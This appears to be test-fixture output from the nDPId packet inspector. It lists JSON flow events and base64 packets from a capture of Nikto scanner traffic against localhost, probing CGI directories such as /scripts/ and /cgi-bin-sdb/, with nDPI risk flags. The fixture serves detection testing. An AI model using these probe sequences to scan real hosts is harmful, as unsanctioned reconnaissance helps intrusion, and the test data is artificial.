{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-perl\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276728,"pkt":"AAAAAAAAAAAAAAAACABFAADFuPZAAEAGgzp\/AAABfwAAAcHkH5CSdoDrZ1cRi4AYAED+uQAAAQEICp1m+yCdZvsgR0VUIC9zY2dpLWJpbi8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276728,"flow_last_seen":1576420276728,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276728,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276730,"pkt":"AAAAAAAAAAAAAAAACABFAADIS5pAAEAG8JN\/AAABfwAAAcHmH5DcbnOH9ynG7oAYAED+vAAAAQEICp1m+yKdZvsiR0VUIC9jZ2ktYmluLXNkYi8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276730,"flow_last_seen":1576420276730,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276730,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin-sdb\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276733,"pkt":"AAAAAAAAAAAAAAAACABFAADE3RFAAEAGXyB\/AAABfwAAAcHoH5BtNeURIEAjc4AYAED+uAAAAQEICp1m+ySdZvskR0VUIC9jZ2ktbW9kLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276733,"flow_last_seen":1576420276733,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276733,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-mod\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1576420276734,"pkt":"AAAAAAAAAAAAAAAACABFAAC0+gVAAEAGQjx\/AAABfwAAAcHqH5Dwf8IdIiKU7IAYAED+qAAAAQEICp1m+yadZvsmR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnBhdGhzKQ0KDQo="} -01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276734,"flow_last_seen":1576420276734,"flow_idle_time":7440000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1576420276734,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:paths)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1576420276738,"pkt":"AAAAAAAAAAAAAAAACABFAADXryVAAEAGjPl\/AAABfwAAAcHsH5B635cEZT8z4YAYAED+ywAAAQEICp1m+yqdZvsqR0VUIC9jbGllbnRhY2Nlc3Nwb2xpY3kueG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjbGllbnRhY2Nlc3Nwb2xpY3kpDQoNCg=="} 
